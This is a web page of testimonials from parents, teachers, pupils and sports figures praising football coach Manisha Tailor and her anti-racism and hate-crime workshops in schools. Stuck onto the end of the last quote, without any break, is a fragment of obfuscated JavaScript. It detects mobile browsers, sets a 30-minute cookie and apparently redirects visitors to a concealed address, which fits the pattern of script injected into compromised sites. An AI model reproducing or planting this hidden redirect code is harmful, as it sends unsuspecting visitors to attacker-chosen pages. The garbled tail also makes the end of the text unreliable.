“Manisha is a giant among men and she was a giant at the Asians in Football forum event I attended with her passion, skill set, will and determination to really make a serious difference. If the FA get Manisha to be the role model who spearheads Asian women in football, then everyone will be positively blown away by the results that will be achieved. Give the right people the positions and mountains can be moved” (Corey Donoghue, FA Tutor).
“Manisha is an example to us all. She talks very eloquently and is a credit not just to the FA, but to the football world”. (Aziz Nejati, parent of a player).
“I have been fortunate to have Manisha working with my son Jamal for over 2 years now. She is a dedicated and intentional person and delightful. Her efficient display of teaching has not gone un-noticed. Her patience, guidance, positive and enthusiastic personality has helped Jamal grow and excel leaps and bounds academically. Jamal describes her as ‘fantastic and helpful’. He is thriving and enjoying the journey. She has unlocked his imagination and creativity. I would highly recommend Manisha to anyone who is looking for a teacher that delivers and produces results. Thank you for all your hard-work” (Tania, parent).
“Great sport can inspire ambition, challenge perceptions and send a positive message about what women and girls are capable of. Having more visible female role models such as Manisha demonstrates strong and varied examples of what women can achieve in sport, in the workplace and beyond”. (Tammy Parlour, Co-Founder Womens Sports Trust)
“Manisha Tailor is a strong and ambitious disability football coach, who is determined to make a difference to the lives of the under-privileged, using the power of football to enable social and confidence skills. When things don’t go her way she picks herself up and moves forward positively and by doing this earns the respect of many of her peers. Her organised approach to training reaches out to people of all ages and makes a significant difference to their lives. I feel very proud to have worked with her and seen her win many accolades for this life changing work. She is one of the highest skilled female coaches in the country. This is all down to her drive and ambition to keep learning and teaching. She is one of a kind.” (Jas Jassal, Co-Founder Inventive Sports).
“Manisha is a selfless, inspirational individual, who has used her personal challenges to provide hope and guidance to others facing similar situations. Her integrity and passion are admirable and listening to her podcast really had an impact on me. Manisha, you should be really proud of all your achievements and you are living proof that if you really believe in something, you can achieve your goal’s despite the obstacles that you may be faced with”. (Raj Sangha)
“Gosh, I LOVED the podcast. I had to stop it a few times because I was getting quite choked up but it’s just so raw and honest and that’s what’s missing within the Asian media landscape. Everyone is so focused on looking great, being popular and portraying themselves as a certain way whether it’s instagram famous or being seen as some sort of celebrity that it takes away from real life and real issues that they can play a part in altering. That’s what I liked about this particular interview though – it touches on so much and reveals so much and makes you think, if one person can reveal so much about themselves and work to fix actual issues that plagues the community, think about what 100 people could do, or 1,000”. (Safeera Sarjoo – blogger at Habibilifestyle.com)
“Manisha worked with year groups 7 and 8 which consisted of 80 children. They were all focused during the video and discussion. The presentations got all the young people thinking about different words to do with racism and respect. The question and answer session was addressed very well and posed engaging questions. As a school we found out that many of our young people speak different languages at home that we didn’t even know about! This has opened up a whole new landscape of ideas and the students learned key ideas that they didn’t know before. The football session gave a nice break to the structure of the morning. It was a good morning!” (Teachers, Roysia Middle School).
“We learned that racism isn’t just about the colour of your skin – it is also about nationality, religion and culture. We also learned about people and where they are born as well as about respecting each other’s feelings and how important this is. We enjoyed the poster session and working in groups. We also liked the football session because it was fun and we were able to connect with children we normally do not talk to.” (Year 7 & 8 pupils, Roysia Middle School).
“The definition of ‘racism’ was made very clear to the children and that it is made up of different forms. Manisha encouraged the children to work together in unfamiliar groups. It was fantastic! Great to hear the ideas from the young people flowing and to see the way they took to the subject in a positive way.” (Teachers from Westfield Primary School, Woking).
“We learned that racism is taken very seriously and can sadly end in death. We didn’t know important it was to stop it from happening. One person from our class spoke Polish and taught us a few words through their group poem which was fun! We learned that racism can hurt people and make them feel hurt and angry as well as damage them. We also learned that culture is what you do in your everyday life. Being of different skin colour does matter – we should all be able to live together. Thank you for teaching us about racism”. (Pupils from Years 4-6 from Westfield Primary School, Woking).
“Manisha is a dedicated, intelligent coach with a particular eye for creating the right environment. An environment that is conductive for technical and social development”. (Anthony Obeng-Manu, parent of Middlesex CoE player & Coach at Hayes and Yeading Youth).
“Today’s workshop opened up lots of areas for discussion that we will follow up during personal, social and health education and circle time. Their previous ideas were challenged and Manisha brought a greater understanding of differences and ‘self’. The responses from the pupils were interesting and they were encouraged to work in teams.” (Ms Nicole White, Year 5 teacher from St Margaret Clitherow Primary School, Stevenage).
“We learned that using the words ‘black and ‘white’ are not racist unless you say it in a mean way to hurt someone. We have a better understanding of what racism is and how it can affect people. We now know what culture and nationality means and found the day interesting. We have learned more about our teacher who’s mum is from Kenya. We are all equal and should be treated that way! It was a fun day but a little bit tricky. The sports session outside was awesome!” (Pupils from Year 5 from St Margaret Clitherow Primary School, Stevenage).
“Through the workshop that Manisha delivered I have gained a better understanding of the terminology used when describing people. For example using the term ‘mixed-heritage’. The pupils in the class have learned a lot and were able to work in groups to create and present their poems. Moving forward we now know the work that we have to do”. (Helen Keogh – Year 5 class teacher, Andrews Lane Primary School, Cheshunt).
“We found the DVD interesting and learned that we should not be racist – it is bad! We now understand that if we use words like ‘black’ to describe someone as an adjective it is not racist, we have to think about how we say things to other people. We have learned words such as ‘mixed-race’ and ‘mixed-heritage’. We should not judge people because of their religion, skin colour, nationality or culture. You are allowed to describe someone, but in a nice way – racism needs to stop. We really enjoyed today and liked performing the rap poem and working in groups. This meant we had to work in teams and we liked this”. (Year 5 pupils from Andrews Lane Primary School, Cheshunt).
“Manisha led on two sessions with the students and both were pitched at the right level for the students that we have in our school. Both groups fully engaged in the learning and the safe space meant that they were confident in sharing their life experiences. This gave them a fair and accurate account of Hate Crimes” (Carol – Teacher at the YMCA School, Southend).
“The session that Manisha took was very engaging and the kids loved it! The pupils were very honest and both groups she had were different, but both engaged and interacted”. (Nicole – student social worker, YMCA School, Southend).
“You are an inspiration in football, to not just women, but to everyone who has a vision and need guidance”. (Stel, founder of Shoot the Defence).
“It was an excellent day. I learned some new football skills to teach my children! It was brilliant listening to the inspiring poems that the children created in the racism workshop with Manisha”. (Mrs Ashcroft, Class teacher – Highless Primary School, Peterborough)
“We really liked doing the fitness session because it was fun! Sport has a lot of value and we wish we could have done more. It was good today because we learned to work as a team and that you should never give up. Writing and presenting the poems was so much fun. We now know that racism is like bullying and that people should show others respect”. (Year 6 – Highless Primary School, Peterborough)
“The session Manisha led with the girls generated extremely thought provoking discussion. The students were engaged and fully involved in topics relating to racism and sexism. It was great to be a part of it!” (Mrs Woollatt, Year 9 class teacher, Bishops Hatfield Girls School – Hatfield)
“In the session with Manisha we learned that everyone is equal and that you should be treated in that way and that discrimination can affect everyone. You should never judge a book by its cover, meaning that you should always get to know someone before making assumptions, so that you get to know who they really are. Before the session started I did not know how to describe myself being half-Scottish and half English, but I do now. It doesn’t matter who you are, you can still achieve your desires. I had never seen a female firefighter before and was shocked when I went to where my dad works as there was only one. I better understand that it can be hard for girls and that no matter what gender you are, you can do anything as long as you put your mind to it!” (Year 9 students, Bishops Hatfield Girls School – Hatfield).
“We liked everything about today. The fitness session was so much fun and it meant we could keep healthy and exercise as well as learn to work in a team. Drawing a person and thinking about what makes them different and their qualities was also fun and it made us think about different religions. We now know that racism is not just about skin colour, but links to culture and religion too. Before the session with Manisha I really did not know that you can have mixed heritage and the message that she gave was you should respect other cultures and be proud of who you are.” (Year 5/6 pupils, St Andrew – Hertford)
“Manisha was very enthusiastic and her session in the classroom gave the children food for thought and they produced some colourful and creative responses to racism. The children were engaged when drawing and writing descriptions of people. They thought about the task and how to illustrate their thoughts on the issue of racism and difference. It was an excellent and well organised day”. (Mr Nigel Morris, Year 5/6 teacher, St Andrew – Hertford)
“Today with Manisha we have learned that religion is very important to respect and that we should also respect people’s culture, nationality and skin colour. We have learned that you should not bully others because they are different to you. Instead we should value everyone to help their self-esteem”. (School Children at Dhekalia school, Cyprus)
“All the pupils enjoyed exploring the key words around racism and producing their poem on what they had discovered” (Class teacher year 3/4 at Dhekalia School, Cyprus)
“With Manisha we learned that working in a team is important and you get more things done by working together. We had to work with people we normally do not work with which was good as it helped to build our confidence and make new friendships. Some of us were finding the activity challenging but we kept trying and didn’t give up. We learned that you shouldn’t hurt people’s feeling and we should show respect to everyone”. (Year 3 children, Ayios Nikolaos primary, Cyprus)
“It was very enlightening to hear the children’s thoughts and ideas about racism. They came up with some really thoughtful points about working with children who they wouldn’t usually play with”. (Louise ware, class teacher year 3, Ayios Nikolaos, Cyprus)
“This morning’s workshop and activities led by Manisha have given me and others an awareness of what being racist is and entails. I am more aware of how to behave, speak and embrace all people equally, irrespective of their background. I believe we would have benefitted if the workshop was over a two day period! Thanks for everything, you were great! (Year 3 learning support assistant, Afua oteng-gyan, Ayios Nikolaos school, Cyprus)
“Year 6 were very engaged all day and I felt that Manisha made them think deeply about their views and opinons on Hate Crime. I think it was aimed right – not too hard, or adult.” (Miss Shore, Year 6 – Kingsmoor Academy, Harlow)
“In Manisha’s session we have learnt the proper definition of a hate crime and how to deal with it. We now know that a hate crime is not just about race, but it also links to religion, disability and being gay or lesbian. We spoke about words that relate to feelings such as: tolerance, empathy self-esteem, confidence and sad. In our football fitness session we were encouraged to work and co-operate with those we may not normally work with and it helped us to work in a team. It was fun!” (Year 6 pupils – Kingsmoor Academy, Harlow)
“We have learned that you do not need to be worried about being different. You should be strong, kind, considerate and be willing to share with others. We now know that using the word ‘black’ is not rude as long as you use it in a positive way. We should not judge people by what you see. Today was really interesting and we enjoyed it with Manisha!” (Children at Creswick Primary School, Welwyn Garden City)
“It was really good to have the open conversation with the children. In Manisha’s session there were lots of opportunities for the children to learn from each other and they are now very clear about what racism is.” (Kevin Peart, Cheswick Primary School – Welwyn Garden City)bw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}